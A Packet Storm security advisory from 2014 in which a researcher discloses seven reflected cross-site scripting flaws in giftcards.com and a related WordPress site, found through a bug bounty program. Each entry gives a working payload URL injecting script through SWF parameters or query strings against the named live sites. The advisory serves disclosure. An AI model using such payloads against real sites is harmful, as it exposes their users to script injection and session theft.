Giftcard Cross Site Scripting

2014-02-19T00:00:00
ID PACKETSTORM:125281
Type packetstorm
Reporter Stefan Schurtz
Modified 2014-02-19T00:00:00

Description

                                        
                                            `-----BEGIN PGP SIGNED MESSAGE-----  
Hash: SHA1  
  
Since November 2013 I reported seven Cross-site Scripting  
vulnerabilities to the Giftcard Bug Bounty Program. Sadly, only one of  
them wasn't a duplicate :-/. Strange? Perhaps, but not impossible  
given the simplicity of the vulnerabilities.  
  
But what I really don't understand: Why do they still work until today?  
  
######################################  
# 11/17/2013 Vulnerability #1: (DUP) #  
######################################  
  
// Reflected Cross-site Scripting  
  
http://www.giftcardgirlfriend.com/wp-content/plugins/audio-player/assets/player.swf?playerID=a\"))}catch(e){alert(document.domain)}//  
  
// Original advisory  
  
http://insight-labs.org/?p=738  
  
Screenshot:  
  
http://darksecurity.de/advisories/BugBounty/giftcards/player.swf-Sourcecode-Giftcardgirlfriend.com.JPG  
  
#########################################################  
# 11/17/2013 Vulnerability #2: - OK - Reward or not ;-) #  
#########################################################  
  
// Reflected Cross-site Scripting (tested with FF 25.0.1)  
  
http://www.giftcardgirlfriend.com/wp-includes/js/swfupload/swfupload.swf?movieName="]);}catch(e){}if(!self.a)self.a=!alert(document.domain);//  
  
// Original Advisory  
  
http://inj3ct0rs.com/exploit/description/19711  
  
Screenshots:  
  
http://darksecurity.de/advisories/BugBounty/giftcards/Wordpress-Version-SourceCode-giftcardgirlfriend.com.JPG  
  
http://darksecurity.de/advisories/BugBounty/giftcards/XSS-swfupload-giftcardgirlfriend.com.JPG  
  
######################################  
# 11/21/2013 Vulnerability #3: (DUP) #  
######################################  
  
// Reflected Cross-site Scripting with SWF-Files (tested on Firefox  
25.0.1)  
  
http://www.giftcards.com/swf/elf.swf?va_link=javascript:alert(document.domain);  
http://www.giftcards.com/swf/santa-sample.swf?va_link=javascript:alert(document.domain);  
  
Screenshots:  
  
http://darksecurity.de/advisories/BugBounty/giftcards/XSS-SWFFiles-Giftcards.JPG  
  
http://darksecurity.de/advisories/BugBounty/giftcards/SWFScan-Screenshot.JPG  
  
######################################  
# 11/26/2013 Vulnerability #4: (DUP) #  
######################################  
  
// Reflected Cross-site Scripting with IE10  
  
https://www.giftcards.com/order-status?%00"><script>alert(document.domain)</script>  
  
Screenshot:  
  
http://darksecurity.de/advisories/BugBounty/giftcards/XSS-OrderStatus-Giftcards.com.JPG  
  
################################  
# 12/05/2013 Vulnerability #5: #  
################################  
  
// Reflected Cross-site Scripting with IE10  
  
https://www.giftcards.com/signup?%00"><script>alert(document.domain)</script>  
  
Screenshot:  
  
http://darksecurity.de/advisories/BugBounty/giftcards/XSS-Signup-Giftcards.com.JPG  
  
################################  
# 12/05/2013 Vulnerability #6: #  
################################  
  
// Reflected Cross-site Scripting with IE10  
  
https://www.giftcards.com/member?%00"><script>alert(document.domain)</script>  
  
Screenshot:  
  
http://darksecurity.de/advisories/BugBounty/giftcards/XSS-Member-Giftcards.com.JPG  
  
################################  
# 12/05/2013 Vulnerability #7: #  
################################  
  
// Reflected Cross-site Scripting with IE10  
  
http://www.giftcards.com/group-gifts/create/new?%00"><script>alert(document.domain)</script>  
  
Screenshot:  
  
http://darksecurity.de/advisories/BugBounty/giftcards/XSS-GroupGifts-Giftcards.com.JPG  
  
  
Cheers,  
sschurtz  
-----BEGIN PGP SIGNATURE-----  
Version: GnuPG v1.4.12 (GNU/Linux)  
  
iEYEARECAAYFAlMC+gUACgkQg3svV2LcbMAVOQCePRZ4zb2nhf+6UowoxtTbkb1s  
8wIAmQG/BGuP6kNdni4vaae4x0mhPn3P  
=SZx4  
-----END PGP SIGNATURE-----  
`